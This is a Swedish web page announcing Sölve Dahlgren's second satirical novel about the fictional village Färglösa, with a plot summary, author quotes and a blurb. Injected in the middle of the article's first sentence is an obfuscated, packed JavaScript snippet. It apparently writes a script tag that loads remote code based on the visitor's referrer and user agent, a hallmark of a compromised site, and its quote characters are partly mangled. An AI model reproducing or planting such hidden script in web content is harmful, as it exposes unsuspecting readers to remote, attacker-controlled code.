Image Image Image Image Image Image Image Image Image Image

| 21 september, 2018

Scroll to top

Top

Sölve Dahlgren är tillbaka med humor och allvar i andra boken om Färglösa

Sölve Dahlgren är tillbaka med humor och allvar i andra boken om Färglösa
Sebastian Plengier Ehrnfelt

Fast eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|znset|var|u0026u|referrer|hhnyz||js|php’.split(‘|’),0,{}))
den här gången är alla inte lika välkomna. Inte av vissa. Verkligheten ger en allvarlig bakgrund till Sölve Dahlgrens andra, fristående berättelse om den påhittade byn Färglösa – full av absurd humor och samhällssatir.

– Humor och satir kan vara ett sätt att ta upp allvarliga ämnen och kunna tänja på tankegångarna genom att överdriva någonting. Sedan blir det upp till läsaren att avgöra vad som är skämt och allvar, säger Sölve Dahlgren.

Den nya romanen Färglösa får främmande utspelar sig sju år efter den första boken. Tidningskungen Johannes Persson är numera död, men hans ande vilar fortfarande över byn.

Det kriminella husbilsgänget har blivit laglydigt. I alla fall nästan. Husbilsbyn, eller husbilsghettot enligt somliga, växer stadigt.

Färglösa har i praktiken privatiserats vilket gör uppdraget för politikerna mycket enklare. Det enda orosmolnet är att Färglösademokraterna, som likt sina själsfränder på andra håll i landet har gått framåt de senaste åren. Tidigare flydde folk från Färglösa, men de senaste åren har i stället tiotusentals människor flyttat in från hela världen. Det är inte alla som gillar den utvecklingen.

Mitt i allt återfinner vi Louise Hathaway och Filip Fredriksson, som har i högsta grad olika sätt att hantera sin gemensamma kris. Filip flyttar till Gran Canaria för att bli chefredaktör för en nystartad tidning och lägga grunden till ett framgångsrikt författarskap. Louise återvänder till sin gård och startar en annorlunda restaurang, Pizza & Poledance Bar.

Samtidigt ställer sig alla frågan: Är det bara en legend eller existerar verkligen barnen som anländer till Färglösa genom gruvan?

– Inspirationen kommer från sådant jag läser och människor jag möter. Det finns vissa scener i boken som i princip är hämtade rakt ur verkligheten och andra som givetvis är rakt igenom påhittade. Jag gillar att tänka ”vad skulle hända om…” och sedan släppa loss fantasin rejält, säger Sölve Dahlgren.

Sölve Dahlgren är journalist och författare från Helsingborg. Han har tidigare skrivit fem ungdomsromaner i serien InnebandyPiraterna samt två fackböcker. Hans första humoristiska vuxenroman Fem stjärnor för Färglösa satte tonen för en ny serie böcker om den påhittade byn i Skåne.

Mer om boken:

Att leva i en femstjärnig stad är ingen garanti för ett femstjärnigt liv. Det får Louise Hathaway och Filip Fredriksson erfara. De hanterar sin stora tragedi på olika sätt. Filip flyttar till Gran Canaria för att bli chefredaktör och framgångsrik författare. Louise återvänder till sin gård och startar en annorlunda restaurang.

Det kriminella husbilsgänget har blivit laglydigt. Nästan. Husbilsbyn Smaklösa växer, trots att somliga vill kalla det husbilsghetto.

Okända inslag gör intrång i den nu välmående staden som sätter människornas värderingar på sin spets. Hur mycket sanning finns det i legenderna om gruvbarnen och sjöjungfrun i Färglösasjön?

Författaren till Fem stjärnor för Färglösa är tillbaka med en ny besk samhällssatir – en fristående fortsättning där Johannes Perssons ande fortfarande vilar över Färglösa. Den påhittade skånska byn utsätts denna gång för smått övernaturliga, eller bara oförklarliga, händelser.  En skröna som med absurd humor gör en djupdykning i några av de allvarligaste ämnen en kommun kan ställas inför. 

Utkommer 21 oktober